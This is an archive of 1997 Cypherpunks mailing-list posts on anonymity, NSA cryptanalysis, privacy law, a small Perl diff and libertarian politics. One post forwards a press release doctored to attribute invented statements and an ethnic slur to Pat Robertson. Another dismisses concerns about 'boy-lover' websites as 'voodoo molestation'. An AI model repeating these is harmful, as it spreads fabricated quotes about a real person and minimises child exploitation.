criminal justice system based on a 100% effective truth detection 
machine.






From 3umoelle at informatik.uni-hamburg.de  Fri Aug 22 13:32:57 1997
From: 3umoelle at informatik.uni-hamburg.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Sat, 23 Aug 1997 04:32:57 +0800
Subject: US DoC on anonymizer
Message-ID: 



http://www.ntia.doc.gov/ntiahome/speeches/licomnet_101496.htm

 "A Vision of Tomorrow: Using Technology to Empower, Not to Control"

   We also endorse the use of technology to give privacy protection. For
   instance, individuals can use filtering technologies that read rating
   tags and block those that fail to achieve a desired level of privacy.
   PICS technology is being adapted to screen out Web sites that do not
   adhere to a specified level of privacy protection. Another example is
   the "anonymizer," which assigns an anonymous identity to a user and
   allows the user to shield personal information from Web sites that he
   or she visits.






From ant at notatla.demon.co.uk  Fri Aug 22 14:07:57 1997
From: ant at notatla.demon.co.uk (Antonomasia)
Date: Sat, 23 Aug 1997 05:07:57 +0800
Subject: Say No To Robertson (was Say No To Christ)
Message-ID: <199708222041.VAA04029@notatla.demon.co.uk>



>  

>  Great Barrington, MA -- In a recent
>  pronouncement, television evangelist and
>  head of the Christian Coalition, Pat
>  Robertson, advocated death by stoning for
>  UFO enthusiasts.

>  Robertson used the news of the July 4th
>  Mars landing to promote his extreme
>  beliefs.

>  "The Bible says the Earth belongs to man,
>  but the heavens belong to the Lord,"
>  Robertson said.

"The earth is the LORD's and the fulness thereof;"  Psalm 24:1

Administration != Ownership
an idea seemingly beyond all politicians 

--
##############################################################
# Antonomasia   ant at notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################






From vznuri at netcom.com  Fri Aug 22 14:13:05 1997
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Sat, 23 Aug 1997 05:13:05 +0800
Subject: Mathematics > NSA + GCHQ
In-Reply-To: 
Message-ID: <199708222025.NAA03687@netcom12.netcom.com>




>We haven't discussed this point in  a while, but the belief most
>cryptologists have is roughly this:
>
>The world-wide community of mathematics and cryptology researchers, linked
>through open publication of new research results, is GREATER than the
>cloistered NSA and GCHQ communities of researchers.
>
>Thus, as bright as Brian Snow or Don Coppersmith or John Conway may be, the
>"edge" the NSA may have once had is largely gone. Which is not to say that
>they are not still a formidable technical organization, with substantial
>computer resources.

I've thought about this, and still wonder if the NSA may have an 
edge. imagine have huge, unlimited resources to spend on whatever
you want. all other mathematicians/researchers in the world are subject to 
having to scrape fund money together via grants. 

guess who grants the
grants? government. and in some cases, I think that it is possible the
grant process is subject to manipulation by government agencies. the
really hot stuff may not be getting funded, because the NSA secretly
pulls the plug and the researcher just thinks, "gosh darn it, didn't
get the grant". a great conspiracy theory, eh? 

as for commercial R&D, it is always ultimately directed toward making
money. this limits the freedom of the researcher as well.

now consider that the NSA is the world's single largest employer of
mathematicians. believe I have seen this claim in some articles on
them. now realize that none of their research is allowed to
be publicized. that is, they can read the open literature, and they
also have their own resources to go past it. individual researchers
outside of the NSA do not have the advantage of seeing what the
NSA is doing. hence a bit one-sided here as well.

consider now that the NSA is not just the largest mathematical
employer, but that they aggressively go after the *best* without
anyone realizing it. consider the spiel: "do a patriotic service
for your country. be among the few, the proud, the spooks". this
they give to the greatest mathematicians you can imagine. it's not
too unlikely. I suspect there are a lot of researchers working for
the NSA with academic "cover stories". hence people you think are
extremely talented and are not working in it are actually working
for it.

some theories, nothing more.

on the other hand, many people have spoken of the compartmentalization
of the government, esp. the NSA, and how this makes it myopic and
ineffectual. I'm not so sure about this. the atomic bomb creation
was pretty compartmentalized at first, yet it was very effective.

>But modern crypto systems are, as we all know, based on fundamental
>mathematical results, e.g., the difficulty in finding the factors of a
>large number, the difficulty in extracting logarithms, etc. And while
>advances in factoring have occurred, often at government labs (think of
>Sandia), the fast factoring of a 1000-decimal-digit number appears
>unachievable.

something to consider is that there has been no major incentive for
anyone to really find such an algorithm until recently, say within
the last 10 years or so. I believe it is mistaken to pretend that
mathematicians have been trying to find an efficient factoring algorithm
since the dawn of math. perhaps out of amusement, but not seriousness.
there is no practical reason why large numbers needed to be factored
in math other than curiousity, until recently. what I am saying is
that I doubt the worlds greatest mathematicians of the past spent much
time trying to find a fast factoring algorithm.






From cynthb at sonetis.com  Fri Aug 22 14:16:41 1997
From: cynthb at sonetis.com (Cynthia Brown)
Date: Sat, 23 Aug 1997 05:16:41 +0800
Subject: Picketing with packets enhanced version
In-Reply-To: <199708221937.VAA05218@atro.pine.nl>
Message-ID: 



On Fri, 22 Aug 1997, Patrick Oonk wrote:

> There were several problems. One of it still remains, 
> it does not resolve FDQN's, so you have to use IP-numbers in
> the hosts file.

Suggested mod:

---snip---
# diff -e picket.orig.pl picket.pl
55,57d
50c
     if ($host =~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) {
       $ipaddr = inet_aton( $host ) ||
         die "inet_aton: invalid IP address $host";
       }
     else {
       $ipaddr = (gethostbyname($host))[4] ||
         die "gethostbyname: hostname $host not found";
       }






From declan at well.com  Fri Aug 22 14:31:21 1997
From: declan at well.com (Declan McCullagh)
Date: Sat, 23 Aug 1997 05:31:21 +0800
Subject: Marc Rotenberg on Time cover story on privacy (fwd)
Message-ID: 





---------- Forwarded message ----------
Date: Fri, 22 Aug 1997 14:12:25 -0700 (PDT)
From: Declan McCullagh 
To: fight-censorship at vorlon.mit.edu
Subject: Marc Rotenberg on Time cover story on privacy

[My comments on privacy that I forwarded yesterday under the Subject: line
"Response to Time cover on privacy" were in response to Marc's criticism,
attached below. -Declan]

---------- Forwarded message ----------
Date: Thu, 21 Aug 1997 11:49:13 -0400
From: Marc Rotenberg 
To: declan at well.com
Subject: Re: FC: Response to Time cover on privacy

----

Josh -

I appreciate the excellent coverage of privacy issues in this
week's Time Magazine and at the Pathfinder site, but I am
concerned about three particular points made in your
article and the general tenor of your reporting.

First, much of your discussion of the privacy issue assumes
that there is a necessary trade-off between privacy and
social benefit. Give up some data, get a good parking space.
I think this is a very shallow view of privacy rights. A
person who lives in a prison has very little privacy and
very little benefit. An affluent person in a democratic
society, however, may have both. Clearly, there is something
more going on than a zero-sum game.

Many of the current efforts to promote genuine privacy
enhancing techniques, such as anonymous cash, are based on
the belief that we can obtain many of the same benefits
of customized service without giving up personally
indentifiable information. In this context, the
discussion of cookies is critical -- a non-actual
user identified cookie is very good for service and
privacy, but a user-identified cookie can be good
for service but bad for privacy. But your discussion
of cookies glosses over this critical point.

These questions come up all the time. Should intelligent
highways capture actual IDs? Can medical services be
delivered psuedo-anonymously? What about communication
services? Web access? You substituted an old privacy
cliche ("in the modern world we give up some privacy
for some benefit") for coverage of the interesting,
cutting edge policy issues that the net and the
debate about identity has raised.

Second, following Alan Westin's line, you suggest that
we have generally avoided privacy legislation in the private
sector. This is simply not true. We have federal privacy
legislation for credit record (1970), school records
(1974), bank records (1978), cable subscriber records
(1984), stored email (1986), video rental records (1988),
junk faxes and auto dialers (1991), and dozens more at
the state level for everything from insurance and health
records to library records.

You can say that these laws are at times ineffective or
incoherent -- why federal privacy for video records
but nor medical records? -- but it is just wrong to start
tearing pages from the history books and the US code
to support a bias against privacy laws. Alan should know
better; you should as well.

Finally, you and Kevin K. take a big swing at my call for
privacy legislation and a privacy agency. I appreciate that
it is a cardinal rule of some to oppose any government
anything, but at least understand the argument for the
privacy agency


  "We need new legal protections to enforce the privacy act, . . ."

The Privacy Act was established in 1974 to restrict the
ability of government to collect information on citizens
and to give citizens the right to get access to their
own files. But since '74, federal agencies have shown
little interest in upholding the law and privacy
concerns *across the federal government* have
mushroomed.

Do I take from Kevin's criticism that he would prefer
that there was no effort to improve enforcment of the
Privacy Act, limit record sharing in the government,
and ensure people get access to their own files? Is
that right?

Can we at least agree that the Privacy Act plays
an important role in protecting citizen rights and
that efforts to strengthen it should be supported?

  " . . . to keep federal agencies in line, . . .'

So that, for example, when law enforcement agencies in
the federal government press the White House and the
OMB for new law enforcement authority there is a
counterveiling agency in the government that requires
that privacy concerns are addressed before the proposal
reaches the President's desk. And if they aren't
adequately addressed, maybe the proposal doesn't
get to the President's desk.

It is obvious after both the Clipper episode and the OECD
Crypto Guidelines that governments with privacy agencys
have done a better job resisting these calls for
extended government surveillance. The problem is that
the one-dimensional critique of government provided in the
article (and Wired and Netly) simply doesn't allow for the
possibility that one of the best ways to constrain government
power is through checks and balances. That, btw, was the key to
controlling government authority in the US Constitution.

In the absence of a federal privacy agency, you can
almost be guaranteed that administration proposals
will always tip in favor of surveillance. And
the irony of the opposition by some to a federal
privacy agency is that it has made it easier over the
last few years for NSA/FBI to push forward crypto
standards and roll the Department of Commerce. What in
the federal government should stop them? Absent an
office to push back, they have a clear course to the
President's desk.

  " . . . to act as a spokesperson for the Federal Government . . ."

This is for the fairly obvious reason that privacy is one
of the biggest issues today in the US and there is no
office in government that can even say authoritatively
what the position of the US is. (Note that this problem
doesn't exist over on the surveillance side or with
copyright protection. The government values both. So David
Aaron was given the title and the authority to promote
the Administration position on key escrow/key recovery,
and Bruce Lehman did the same at WIPO for copyrights
interests. Do you understand now what's going on?).
The result is that there is not even a basis for
trade discussion or government negotiation.

 . . . and to act on behalf of privacy interests."

So that when SSA is putting PEBES on line there is
some privacy evaluation.

Or, to take a recent European example, the new German
communications law encourages the development of
anonymous payment schemes to promote on-line commerce
and to protect privacy. Where did the idea come
from? The privacy agency.

So, I have to ask, what is it exactly in my proposal that
you/Kevin/Declan object to? Is it the fact that there
will be a government ? I can't argue against
that. You're entitled to your religious beliefs, but it
has nothing to do with reporting or policy. Is it
the fact that Trustee, OPS will do all of this better?
If you have been following my point, you'll realize now
that doesn't make any sense. Or what if it costs taxpayer
dollars? In 1993 I backed creation of a federal privacy
agency. Total cost: $5 m.  The industry balked. "Too expensive.
We have to trim the federal budget." The following year they
backed Digital Telephony and a $500 m authorization
to make the phone system easy to wiretap.

I am also getting a little tired of the myth of the small
town where everyone knew everything about everyone else and
that there was no privacy. First off, this myth runs directly
contrary to another, better description of American society
-- the unexplored frontier. Where exactly did all those frontiersmen
come from? The answer is the small town. People were constantly
picking up and moving, building new homes, and establishing
new identities. Many people born in these small towns left and
went to school, joined the military, started businesses, moved to
the city. Mobility, more than any other characteristic, is central
to the American experience. Read Tocqueville. Civic association
was and is constantly formed and reformed.

Finally, I do agree with Kevin that privacy is very much about
social relations. In fact the tag line for the book that Phil Agre
and I edited for MIT Press, "Technology and Privacy: The New Landscape"
http://www-mitpress.mit.edu/book-home.tcl?isbn=026201162X
begins "Privacy is the capacity to negotiate social
relationships by controlling access to personal information."

Privacy rules essentially establish the base lines for
negotiating social relations between individuals and
organizations. If you collect personal information, you
take on some responsibilities. If you give up some
information, you get some rights. You'll find those
principles in just about every privacy law and policy
in the world. Not only is this commonsense, but it
has some nice benefits for an era when technology allows
us to shape new forms of social relations -- we can
design techniques that allow organizations and inviduals
to interact without disclosure of personal information.
Indeed, the web and the Net provided all of this to
us, but now it could be quickly lost.

I don't know what it will take to persuade some of the
opinion leaders in the on-line world that law will play
a critical role in protecting individual privacy in the
coming years, but I'm willing to listen and learn.And I
hope, whatever form this dialogue takes, we can all move
beyond ideology, myth, and charicature.

Marc Rotenberg.
EPIC.


==================================================================
Marc Rotenberg, director                *   +1 202 544 9240 (tel)
Electronic Privacy Information Center   *   +1 202 547 5482 (fax)
666 Pennsylvania Ave., SE Suite 301     *   rotenberg at epic.org
Washington, DC 20003   USA              +   http://www.epic.org
==================================================================










From nobody at REPLAY.COM  Fri Aug 22 14:38:21 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 23 Aug 1997 05:38:21 +0800
Subject: No Subject
Message-ID: <199708222114.XAA25018@basement.replay.com>



At 06:30 PM 8/22/97 +0200, A druken remailer user wrote:
>  To continue...
>  Being an anonymous coward who hides behind remailers the few times

Did Patrick Oonk send this one?

>  Tired of being an anarchist? Tired of waiting for Jim Bell
>to rat you out as being a co-conspirator in his evil plot
>to overthrow the government? Tired of standing in front of your
>mirror, trying to practice acting surprised when armed forces
>from a dozen government agencies kick down your door to announce
>that someone nuked D.C., and they'd like to "ask you a few
>questions?"

If someone nuked D.C., most of those bastards would probably be dead.

Then again... they propably have em stuffed in capsules, to be opened
when communication is lost with Washington D.C.  Millions of theses
bastards!!!!  All located on the surface of Uranus.  Upon losing the
signal with D.C., they'll fly to Earth, to once again enslave the
free.  What's the solution???!!!???  We must send all our nuclear
arsenals to the surface of Uranus, and set them off, ONLY THEN WILL WE
BE SAFE!!!

>Peter Trei:
>  "Hi. I used to be a boring guy. I was so boring that none of the 
>assholes on the list even bothered insulting me, or forging posts in
>my name.
>  "Then one day, my life suddenly changed. Someone forged a post to 
>the list in my name, and it was exciting. It was like getting robbed
>at gunpoint. What a rush!

Heheheh

>Kent Crispin:
>  "This isn't Peter's conspiracy, its MINE! I mean, get real, I
>work in a secret underground lavoratory as a government shill.
>  "Think about it. Who would you expect to conspire against a
>bunch of anarchists...the government! You all know how much I
>love the government and authority. I'm Louis Freeh's secret
>lover. Janet Reno is going to have my baby.
>  "It's me! *I* am the one behind the SECRET CONSPIRACY AGAINST
>THE CYPHERPUNKS LIST. I'm a STATIST, for God's sake, why won't
>you believe me? 
>  "Because I'm not one of the elitist 'chosen?' Fuck you."

Heheh, well, at least they got Kent summed up in 3 paragraphs.

>TruthMonger:
>  "Now Hettinga is stealing Tim May's lines. What the hell is 
>going on, here? Has *everybody* on this list gone crazy?
>  "*I* am the one who is *really* behind the SECRET CONSPIRACY 
>AGAINST THE CYPHERPUNKS LIST. Think about it. Everyone knows
>that I'm a 33rd degree Mason.  No...that's Tim May.
>  "Fuck this shit. From now on, I'm posting as Toto."

heheh

>	There is no conspiracy by a secret government to destroy
>	the Constitution, enslave the people, and rule the world.

"Like them new Stealth Helicopters, equipped with devices to drown out
the sound."

"Dale, where the hell did you hear that!?"

"Alt.conspiracy.black.helicopters"

>	Remember, this is just a normal mailing list with a few list
>	members who are a little odd. There are no spooks.

Except for Kent Crispin.

>	Waco was just a tragic accident. Ruby Ridge was a simple error
>	in judgement by a government agent who really feels bad about
>	following his superiors orders. Heavily armed U.S. Marines are
>	no match for a goat-herding boy with a .22, and it is only by
>	the grace of God that they are alive today. Oswald acted alone.

Yeah, no one's safe when those god-damn goat herding sniper kids,
lucky those good soldiers hit him fast!

There is, however, a secret-conspiracy by Paul Pomes to shut down
remailers.

ConspiracyMonger
"Ahhh, look, another mutilated cow."

"Musta been them aliens."

"Nah, it's them damn black helicopters.  Killin' all my friggin
livestock."






From enoch at zipcon.net  Fri Aug 22 14:48:08 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Sat, 23 Aug 1997 05:48:08 +0800
Subject: Mathematics > NSA + GCHQ
In-Reply-To: <1.5.4.32.19970822193215.00831fc0@pop.pipeline.com>
Message-ID: <19970822212925.30178.qmail@zipcon.net>



John Young writes:

> Along this line:

> A few days ago we received an 8-page excerpt from "Shift Register
> Sequences," by Solomon W. Golomb (at USC), Holden-Day, Inc., 
> no date, with a handwritten note:

>    NSA has tried to suppress knowledge of this stuff. Nearly all NSA 'good'
>    algorithms are based on this technology.

> IANAM, so would any of the mathematicians here give any credibility to 
> this claim?

"The Magic Singing and Dancing Shift Register Algorithm" has been making
the rounds for a number of years now, and surfaces in various forms at
periodic intervals on the Net. 

It is based on a mathematical technique once used to do transcendental
function approximation on now slow and obsolete calculator chips, and as
far as I can tell, offers no magic insights into efficient ways of
computing cryptographically interesting functions, such as factoring,
descrete log, or symmetric block cipher key recovery.

I would put it in my comedy file along with the "RSA is Easy To Break"
paper, and similarly innumerate rants. 

> We'll scan and put the excerpt on our Web site if worthwhile.
> It's composed of the book's 3 page preface and 5 pages of text and
> diagrams of Chapter 2 on The Shift Register as a Finite State Machine,
> with principal focus on de Bruijn diagrams for shift registers.

The book is probably a serious text on the mathematical techniques in
question.  But unless you are looking for a way to compute Trig functions
with lots of iterations and little hardware, it probably isn't worth more
than a cursory glance.  It's not going to break codes for you.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From anon at anon.efga.org  Fri Aug 22 14:51:54 1997
From: anon at anon.efga.org (Anonymous)
Date: Sat, 23 Aug 1997 05:51:54 +0800
Subject: None
Message-ID: 



It's not an _Onion_ satire:
 

---------- Forwarded message ----------
From: bofus?
Subject: Pat Robertson advocates stoning for crypto enthusiasts
Date: Fri, 22 Aug 1997 07:39:49 -0800
Message-ID: <33FDB249.335F at mindspring.com>

RuffinP at aol.com wrote:
>
>
>
>
>
>  FREEDOM WRITER PRESS RELEASE
>
>  FOR IMMEDIATE RELEASE July 28, 1997
>  CONTACT: Skipp Porteous (413) 528-3800
>
>
>
>  Robertson advocates stoning for UFO
>  enthusiasts
>
>
>  Great Barrington, MA -- In a recent
>  pronouncement, television evangelist and
>  head of the Christian Coalition, Pat
>  Robertson, advocated death by stoning for
>  crypto enthusiasts.
>
>  Freedom Writer magazine, in its July/August
>  issue, mailed today, disclosed Robertson's
>  statement. Freedom Writer is published by
>  the Institute for First Amendment Studies,
>  a group that monitors the right.
>
>  Robertson used the news of the July 25th
>  Senate Commerce Committee hearing to promote
>  his extreme beliefs. A segment on the July 27,
>  1997 broadcast of The 700 Club featured news
>  of the Senate hearing. Employing the
>  historical event as a starting point, the
>  program delved into the possibility of the
>  existence of anonymous free speech on the
>  Internet.
>
>  While Robertson viewed the Internet with
>  suspicion, on a more serious note, he
>  launched into a diatribe against those who
>  entertain the existence of uninhibited free
>  speech on the Internet. He said, in a
>  rambling discourse, that if such a thing
>  existed, it would simply create demons that
>  would lead people away from Christ.
>  According to Robertson, the threat is so
>  serious that people who believe in free
>  speech should be put to death by stoning --
>  according to "God's word."
>
>  "The Bible says the Earth belongs to man,
>  but the Word belongs to the Lord,"
>  Robertson said.
>
>  "He has given us the Earth. He also warned 
>  us in the book of Matthew of the dangers of
>  corrupting forces such as the Internet which
>  can be used for evildoers:
>
>  "'A good tree cannot bear bad fruit, nor can
>  a bad tree bear good fruit. Every tree that
>  does not bear good fruit is cut down and 
>  thrown into the fire. Therefore, by their
>  fruits you will know them. (Matthew 7:17-20)'
>
>  "And you see, there is only one Word, and
>  that is the Word of God:
>
>  "'In the beginning was the Word, and the Word
>  was with God, and the Word was God. (John 1:1)'"
>  'For the Word of the Lord is right; and all his
>  works are done with faithfulness. He loveth
>  mercy and judgment: the earth is full of the
>  mercy of the Lord. (Psalm 32:4-5)'
>
>  So there is no question about it."
>
>  "Can a demon appear as a slanty-eyed,
>  funny-looking computer hacker? Of course
>  he can, or it can. Of course they can deceive
>  people. And if they can lead somebody away
>  from the true God, or away from Jesus
>  Christ, anyway it happens, it doesn't
>  matter, you will lose your salvation. It
>  doesn't matter how they get you. The
>  question is, did they get you, and under
>  what guise?
>
>  "This is man in rebellion against God, who
>  refuses to take God's Law. And God says,
>  'My covenant says you won't do this. And if
>  I find anybody in Israel,'-- "which is his
>  pure nation" -- 'If I find anybody in
>  Israel that's doing this sort of thing,
>  then I want you to take him out and dispose
>  of him."
>
>  "It's a clear violation of God's word.
>  Stone them."
>
>  Skipp Porteous, Freedom Writer publisher,
>  commented: "As the founder and chairman of
>  the Christian Coalition -- a group
>  dedicated to becoming the most powerful
>  political force in America -- Robertson's
>  extreme ideas need to be taken seriously,
>  for they not only negate pluralism, but
>  condemn to death those who dare to believe
>  differently."

--------- End forwarded message ----------







From dlv at bwalk.dm.com  Fri Aug 22 14:55:49 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 23 Aug 1997 05:55:49 +0800
Subject: Mathematics > NSA + GCHQ
In-Reply-To: <1.5.4.32.19970822193215.00831fc0@pop.pipeline.com>
Message-ID: 



John Young  writes:

> Along this line:
>
> A few days ago we received an 8-page excerpt from "Shift Register
> Sequences," by Solomon W. Golomb (at USC), Holden-Day, Inc.,
> no date, with a handwritten note:
>
>    NSA has tried to suppress knowledge of this stuff. Nearly all NSA 'good'
>    algorithms are based on this technology.
>
> IANAM, so would any of the mathematicians here give any credibility to
> this claim? We'll scan and put the excerpt on our Web site if worthwhile.
> It's composed of the book's 3 page preface and 5 pages of text and
> diagrams of Chapter 2 on The Shift Register as a Finite State Machine,
> with principal focus on de Bruijn diagrams for shift registers.

The NSA certainly did try to suppress much shift-register-related stuff.

The recent Sandia lawsuit is over shift register stuff.

There are increasingly persistent rumor of a fast factoring algorithm
based on shift registers.

Therefore anything mentioning them is of interest.

But: Was there any info in the package other than the passages from the book?

I don't think it's a good idea to put up chunks of the book - the publisher
might cry copyright infringement, and everybody probably has it anyway.

[I'm about to turn off this box, so I won't see any responses in a while.]

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From jsmith58 at hotmail.com  Fri Aug 22 15:40:46 1997
From: jsmith58 at hotmail.com (John Smith)
Date: Sat, 23 Aug 1997 06:40:46 +0800
Subject: Shooting the taggers
Message-ID: <199708222214.PAA07946@f50.hotmail.com>



>Here in Santa Cruz, graffiti spray-painted on the walls of businesses 
>is a
>big, and growing, problem. And laws require the businesses to paint 
>over
>>he grafitti, or otherwise render it invisible, in a quick and timely
>manner. (The idea is that the grafitti is offensive to the 
>sensibilities of
>others, or somesuch, and that it encourages rival gangs to counter 
>with
>their own grafitti.)

No, the idea is that the taggers do their thing in order to see
the results of their work on display.  Paint over the results
promptly, and there is no point to tagging.

>There's a solution for taggers: snipers.

A punishment far out of proportion to the crime.

It is a mistake to think that all crimes should be punished by the
most violent means possible.  Notice that most proponents have
never raised children.  They need to learn the importance of
proportionality.

"John

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com






From dformosa at st.nepean.uws.edu.au  Fri Aug 22 16:19:18 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Sat, 23 Aug 1997 07:19:18 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <199708220630.BAA17428@mailhub.amaranth.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 22 Aug 1997, William H. Geiger III wrote:

> Not really as those who work for a living will always be able to afford
> better weapons. :P

I have always found such arms races pointless and unproductive.  Now
instead of paying a small amount of money to the goverment you have to pay
a massive amount of money for a securaty system.  Big thing with video
camers, motion sensors and plungomatic securaty gards.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM/3gNqQK0ynCmdStAQFlEwQArOi1dnRAgmiv8WcARptqMJKdzRTWzahL
Wf72nxsYxW6HyvqoMPlUE7J9K4f33pFBWGHQD0AfPyrTCMkA4IsG/GcxC47ul1Em
gDm9jHzFnSfHY2dAVtTaqKM3oGYDnFDYaUDciGa/xj853fyiLnckST52eSYltAbv
oHUC2z9tPX4=
=x584
-----END PGP SIGNATURE-----






From aba at dcs.ex.ac.uk  Fri Aug 22 17:53:16 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sat, 23 Aug 1997 08:53:16 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court appointed attorneys")
In-Reply-To: <19970821224859.24682@bywater.songbird.com>
Message-ID: <199708222353.AAA00922@server.test.net>




Kent Crispin  writes:
> On Fri, Aug 22, 1997 at 12:40:29AM +0000, Vipul Ved Prakash wrote:
> > 
> > the idea is that the "competent" (not "chosen") are irrevocably different 
> > from those other "incompetent and parasitical" (and not "unfortunate") 
> > creatures that accidentally share the same physical form.
> 
> And how is it that one knows that one is "competent"?

One doesn't.  But if one is not competent, one is likely to find out the
hard way.

There's precious little evolutionary pressures around at the moment,
the race could use some more.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED AUG. 31, 1997
    THE LIBERTARIAN, By Vin Suprynowicz
    'Necessary to the security of a free State'

    J.P. recently wrote: "I agree that things like the court system
can be
privately funded. ... However, my greatest concern is that a military
that
has to run a "pledge drive" in order to provision itself would not be
capable of posing a credible deterrent to any nations bent on
conquering
the US. If  you could address this point, I would appreciate it.

    #  #  #

  O.K. ...

  First, the notion that it's all right to steal at gunpoint "some
modest
amount, as long it serves a legitimate public need" ignores the simple
moral truth that the end cannot be allowed to thus justify the means.

  When I loot your paycheck without your permission to do "good
works," I
can't possibly know whether that leaves you one dollar short of the
money
you needed to buy medicine for your dying mother, or one dollar short
of
the money you needed to complete an experiment that might result in
the
discovery of a cure for cancer.

  There is literally no way to measure the opportunities I thus steal
from
you, and how their potential results might weigh against what (start
ital)I(end ital) decide to do with your money. (Even assuming power
won't
corrupt me until I can blithely assure you that "tobacco subsidies"
are "in
the public interest.")

  But on to J.P.'s main point: the need to fund a standing, federal
army.

  The only thing that grants the United States government any
legitimacy --
that supposedly differentiates it from some gang of bandits that
swarms
down from the hills and extracts tribute for as long as the coast
seems
clear -- is the Constitution.

  The Constitution would have not have been ratified by enough states
to
take effect without solemn binding promises that a Bill of Rights
would
quickly be enacted. Without the Bill of Rights, the Constitution is
invalid
and of no force.

  The Bill of Rights prominently features the Second Amendment, which
instructs us: "A well regulated Militia, being necessary to the
security of
a free State, the right of the people to keep and bear Arms, shall not
be
infringed."

  This is a founding principle of our nation. Should the national
government eviscerate or foreswear that principle, it is not only our
right, but our duty, in Jefferson's words, to "alter or abolish it,
and to
institute new Government."

  The founding document does not find ANY role for a standing,
professional
army in  preserving "the security of a free state." As a matter of
fact,
the founders traveled the land, preaching the EVILS of a professional,
standing army. And they were right.

  Our domestic, professional, standing army today consists of
individual
legions, somewhat on the Roman model but also on the model of the
personalized Waffen SS Divisions created as adjuncts to Hitler's
Wehrmacht,
with personal loyalty oaths sworn to the Fuhrer, and customized
uniforms
adopted with silver dagger or death's-head totems, etc.

  Currently going through precisely the kind of expansion and rearming
that
transformed Hitler's personal bodyguard from the scruffy SA
brownshirts of
1934, to the well-armed, professional SS divisions of 1940, our own
paramilitary legions are today dubbed "ATF, "FBI," "FBI Hostage
Rescue,"
"DEA," etc.

  Some of these units now number in the THOUSANDS, and are authorized
to
deploy COMBAT AIRCRAFT. They routinely train with precisely the kinds
of
explosives and automatic weapons you or I could go to prison for
merely
possessing, and practice rapid helicopter deployment and "dynamic
entry"
into URBAN AREAS. These guys are not just getting ready to investigate
the
next Lindbergh kidnapping.

  Can such outfits exist in parallel with a strong citizen militia?
They
WILL not, and they are currently demonstrating this to us in spades,
by
infiltrating with agents provocateurs every legitimate citizen militia
unit
they can find, framing the leaders on amorphous "conspiracy" charges,
and
sending them away for decades.

  As they say in the popular sword and costume series, "There can be
only one."

  But what is equally important, is to realize that a citizen militia
is
ADEQUATE to defend the security of a free state, even against the
largest,
most powerful, most technologically advanced power in the world.

  George Washington proved this in 1781. And for anyone who harbored
the
illusion that "conditions have so changed in 200 years" that this was
no
longer the case, the Vietnamese and then the Afghans successively
proved it
again, in our own lifetimes.

  Next time: Do we need a standing army, at all?

Vin Suprynowicz is the assistant editorial page editor of the Las
Vegas
Review-Journal. Readers may contact him via e-mail at vin at lvrj.com.
The web
site for the Suprynowicz column is at http://www.nguworld.com/vindex/.
The
column is syndicated in the United States and Canada via Mountain
Media
Syndications, P.O. Box 4422, Las Vegas Nev. 89127.

***


Vin Suprynowicz,   vin at lvrj.com


"A well-regulated population being necessary to the security of a
police
state, the right of the Government to keep and destroy arms shall
not be infringed."







From enoch at zipcon.net  Fri Aug 22 18:07:30 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Sat, 23 Aug 1997 09:07:30 +0800
Subject: CPAC/Sewer/XtatiX Continues to Brew
Message-ID: <19970823005841.13648.qmail@zipcon.net>



Fwd from alt.censorship:  Another unhappy customer of CPAC.

Stephen Hopkins writes:

 > Some time ago, an organisation called CPAC, the murky Child
 > Protection and Advocacy Coalition decided to crusade
 > against certain so-called "boy-lover" sites on the
 > Internet, with the aim of getting them shut down. The
 > organisation, headed by one Anne Cox- -who refuses to
 > identify the organisations comprising CPAC--identified some
 > black-listed sites, of which my own,
 > http://www.stadiou.demon.co.uk, is one of them.

Actually, the Lovely and Talented Ms. Cox is far too shrewd to
actually libel people on her organization's home page, so she
generally links to other sites performing this function, while
maintaining a discreet distance behind an appropriate disclaimer.

Two months ago, I wouldn't have known CPAC from a hole in the
ground.  Today, quite a few people have come to know the
organization and its various shills, largely because of their
attempts at "Ideological Cleansing" on the World Wide Web.

I had a pretty good idea what the organizational agenda was when
I saw the name Debbie Mahoney, who most Usenetters remember from
the Nikki Craft frivolities.  Half a dozen screws short of a
fully connected brain, even on her better days, and an agenda and
a bag of dirty tricks that would have made Richard Nixon jealous.

 > I feel almost honoured that my on-line activities have
 > attracted this much interest, but in including it on a
 > list of "child molestors" and "pedophiles" CPAC attribute
 > far more importance to it than it deserves.

Most of CPAC's visible agenda is pretty reasonable.  It's the
part about harrassing legal First Ammendment protected speech on
the Net, based on their perception of the sexual orientation of
the people engaging in it, because supposedly such people might
*SOMEDAY* commit a crime, that is a bit of a civil liberties
stretch.

Like most Dworks, they believe in "voodoo molestation," where
unnamed children thousands of miles away are vicariously
"exploited" should a single stranger have "impure thoughts" about
them by looking at even innocuous photographs, or should accurate
depictions of childhood sexuality be permitted in mainstream
media. They are getting their nonsense written into the law one
tiny step at a time, the Hatch "synthetic sexual depictions of
minors" smoke and mirrors being their latest accomplishment.

